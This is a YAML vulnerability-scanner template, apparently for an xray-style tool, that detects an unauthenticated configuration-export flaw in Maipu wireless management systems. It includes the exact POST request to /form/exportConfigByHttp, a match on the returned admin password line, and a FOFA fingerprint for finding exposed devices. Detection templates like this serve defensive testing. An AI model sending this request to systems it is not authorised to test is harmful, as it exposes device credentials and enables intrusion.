id: maipu-wuxian-exportconfigbyhttp-disclosure
info:
  name: 迈普无线管理系统存在信息泄露
  author: avic123
  severity: critical
  verified: true
  description: |
    迈普无线管理系统是迈普通信技术股份有限公司自主研发的一套高效、智能的无线网络管理平台。该系统支持对无线接入点（AP）、无线控制器（AC）等设备的集中管理和配置，提供丰富的业务类型和强大的管理功能。通过迈普无线管理系统，用户可以轻松实现无线网络的规划、部署、监控和维护，确保无线网络的高效、稳定运行
    fofa: fid="RXaCdQdVOS1+i76LqOo2aw=="
  reference:
    - https://cn-sec.com/archives/2993782.html
  tags: maipu,disclosure
  created: 2025/03/19

rules:
  r0:
    request:
      method: POST
      path: /form/exportConfigByHttp
      body: |
        Download_config=%E5%AF%BC%E5%87%BA
    expression: response.status == 200 && response.body.bcontains(b'Current configuration')&& response.body.bcontains(b'user admin privilege 15 password')
expression: r0()
